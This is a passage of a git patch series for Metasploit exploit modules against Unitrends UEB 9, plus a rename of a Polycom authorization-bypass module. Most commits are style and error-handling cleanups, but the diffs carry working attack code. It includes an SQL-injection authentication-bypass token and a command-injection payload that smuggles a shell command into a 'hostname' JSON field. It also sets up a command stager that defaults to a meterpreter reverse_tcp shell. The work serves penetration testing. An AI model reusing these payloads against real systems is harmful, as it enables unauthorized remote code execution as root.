@@ -77,11 +79,11 @@ class MetasploitModule < Msf::Exploit::Remote 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session,} + {'AuthToken' => session,} }) - if res.code != 500 - print_error("Unexpected response") + if if res &&res.code != 500 + fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") From 5c0bcd8f0a00765bd7384b02408080abc88935b2 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 13:56:25 -0600 Subject: [PATCH 14/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index cc265a3710..ada6ede2a9 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -51,8 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end - def filter_bad_chars(cmd) - end def execute_command(cmd, opts = {}) @@ -82,13 +80,13 @@ class MetasploitModule < Msf::Exploit::Remote #parse out the bpd port returned, we will connect back on this port to send our cmd bpd_port = buf1[-8..-3].to_i - print_good("bpd port recieved: #{bpd_port.to_s}") - print_status("Connecting to #{bpd_port.to_s}") + print_good("bpd port recieved: #{bpd_port}") + vprint_status("Connecting to #{bpd_port}") s2 = connect(global = false, opts = {'RPORT'=>bpd_port}) - print_good("Connected!") + vprint_good('Connected!') - print_status("Sending command buffer to xinetd") + print_status('Sending command buffer to xinetd') s1.put(data) s2.get_once(-1,1).to_s @@ -104,6 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote def exploit print_status("#{peer} - pwn'ng ueb 9....") - execute_cmdstager(:linemax => 200, :nodelete => true) + execute_cmdstager(:linemax => 200) end end From 16b6248943c0b6b56f45be8075a629c275405f02 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 13:58:12 -0600 Subject: [PATCH 15/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index ada6ede2a9..a2041e2adb 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote disconnect(s2) rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + fail_with(Failure::Unreachable, "#{peer} - Connection to server failed") end end From e9ad5a7dca864e82e3df490653517cd757825484 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:05:15 -0600 Subject: [PATCH 16/22] Update ueb9_api_storage.rb --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index bbcb7120c0..28a773cdd0 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -82,12 +82,12 @@ class MetasploitModule < Msf::Exploit::Remote {'AuthToken' => session,} }) - if if res &&res.code != 500 + if res &&res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end + end def exploit print_status("#{peer} - pwn'ng ueb 9....") From 85152b5f1ec5276af748fd198848bd36394feeaf Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:28:52 -0600 Subject: [PATCH 17/22] added check function --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index a2041e2adb..5830cf118c 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -51,6 +51,19 @@ class MetasploitModule < Msf::Exploit::Remote deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end + def check + s1 = connect(global = false) + buf1 = s1.get_once(-1).to_s + #parse out the bpd port returned + bpd_port = buf1[-8..-3].to_i + + #check if it's a valid port number (1-65534) + if bpd_port && bpd_port >= 1 && bpd_port <= 65535 + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + end def execute_command(cmd, opts = {}) From cce7bf3e191500a46b3ad4b7500d6a6a1784a0eb Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:33:46 -0600 Subject: [PATCH 18/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 5830cf118c..bafbebe26a 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote else Exploit::CheckCode::Safe end - end + end def execute_command(cmd, opts = {}) From 8f622a5003ecf28070f012b896c346fb531e11c3 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:35:03 -0600 Subject: [PATCH 19/22] Update ueb9_bpserverd.rb --- modules/exploits/linux/misc/ueb9_bpserverd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index bafbebe26a..963ba47dff 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote buf1 = s1.get_once(-1).to_s #parse out the bpd port returned bpd_port = buf1[-8..-3].to_i - + #check if it's a valid port number (1-65534) if bpd_port && bpd_port >= 1 && bpd_port <= 65535 Exploit::CheckCode::Detected From c26779ef54a7fa45ce98d538d8d220f112360065 Mon Sep 17 00:00:00 2001 From: caleBot Date: Fri, 20 Oct 2017 14:39:39 -0600 Subject: [PATCH 20/22] fixed msftidy issues --- modules/exploits/linux/http/ueb9_api_storage.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index 28a773cdd0..fb31d093d6 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -68,8 +68,8 @@ class MetasploitModule < Msf::Exploit::Remote #substitue the cmd into the hostname parameter parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`| - parms << filter_bad_chars(cmd) - parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| + parms << filter_bad_chars(cmd) + parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}| res = send_request_cgi({ From 5abdfe3e59f75428e4c39d38e0710fde0e7de59c Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 19:59:24 -0400 Subject: [PATCH 21/22] ueb9 style cleanup --- .../exploits/linux/http/ueb9_api_storage.rb | 22 ++++++++----------- modules/exploits/linux/misc/ueb9_bpserverd.rb | 13 +++++------ 2 files changed, 15 insertions(+), 20 deletions(-) diff --git a/modules/exploits/linux/http/ueb9_api_storage.rb b/modules/exploits/linux/http/ueb9_api_storage.rb index fb31d093d6..ecbd7bea32 100644 --- a/modules/exploits/linux/http/ueb9_api_storage.rb +++ b/modules/exploits/linux/http/ueb9_api_storage.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## - - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -41,10 +39,10 @@ class MetasploitModule < Msf::Exploit::Remote [ 'UEB 9.*', { } ] ], 'Privileged' => true, - 'DefaultOptions' => - { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', - 'SSL' => true - }, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => true + }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) register_options( @@ -62,7 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote end def execute_command(cmd, opts = {}) - session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass session = Base64.strict_encode64(session) #b64 encode session token @@ -79,19 +76,18 @@ class MetasploitModule < Msf::Exploit::Remote 'encode_params' => false, 'data' => parms, 'headers' => - {'AuthToken' => session,} + {'AuthToken' => session} }) - if res &&res.code != 500 + if res && res.code != 500 fail_with(Failure::UnexpectedReply,'Unexpected response') end - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end def exploit print_status("#{peer} - pwn'ng ueb 9....") execute_cmdstager(:linemax => 120) - end end diff --git a/modules/exploits/linux/misc/ueb9_bpserverd.rb b/modules/exploits/linux/misc/ueb9_bpserverd.rb index 963ba47dff..0e5e456c23 100644 --- a/modules/exploits/linux/misc/ueb9_bpserverd.rb +++ b/modules/exploits/linux/misc/ueb9_bpserverd.rb @@ -38,15 +38,14 @@ class MetasploitModule < Msf::Exploit::Remote [ 'UEB 9.*', { } ] ], 'Privileged' => true, - 'DefaultOptions' => - { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', - 'SSL' => false - }, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'SSL' => false + }, 'DisclosureDate' => 'Aug 8 2017', 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(1743), + register_options([ + Opt::RPORT(1743) ]) deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') end From fd028338e13ea560b562b6614359709e80260860 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 20:08:11 -0400 Subject: [PATCH 22/22] move psh to polycom so no more powershell name collision --- .../misc/{psh_auth_bypass.md => polycom_hdx_auth_bypass.md} | 0 .../{misc/psh_auth_bypass.rb => polycom_hdx_auth_bypass.rb} | 2 +- 2 files changed, 1 insertion(+), 1 deletion(-) rename documentation/modules/exploit/unix/misc/{psh_auth_bypass.md => polycom_hdx_auth_bypass.md} (100%) rename modules/exploits/unix/{misc/psh_auth_bypass.rb => polycom_hdx_auth_bypass.rb} (99%) diff --git a/documentation/modules/exploit/unix/misc/psh_auth_bypass.md b/documentation/modules/exploit/unix/misc/polycom_hdx_auth_bypass.md similarity index 100% rename from documentation/modules/exploit/unix/misc/psh_auth_bypass.md rename to documentation/modules/exploit/unix/misc/polycom_hdx_auth_bypass.md diff --git a/modules/exploits/unix/misc/psh_auth_bypass.rb b/modules/exploits/unix/polycom_hdx_auth_bypass.rb similarity index 99% rename from modules/exploits/unix/misc/psh_auth_bypass.rb rename to modules/exploits/unix/polycom_hdx_auth_bypass.rb index efd720ef17..f53b3d776f 100644 --- a/modules/exploits/unix/misc/psh_auth_bypass.rb +++ b/modules/exploits/unix/polycom_hdx_auth_bypass.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote update_info( info, 'Name' => 'Polycom Command Shell Authorization Bypass', - 'Alias' => 'psh_auth_bypass', + 'Alias' => 'polycom_hdx_auth_bypass', 'Author' => [ 'Paul Haas ', # module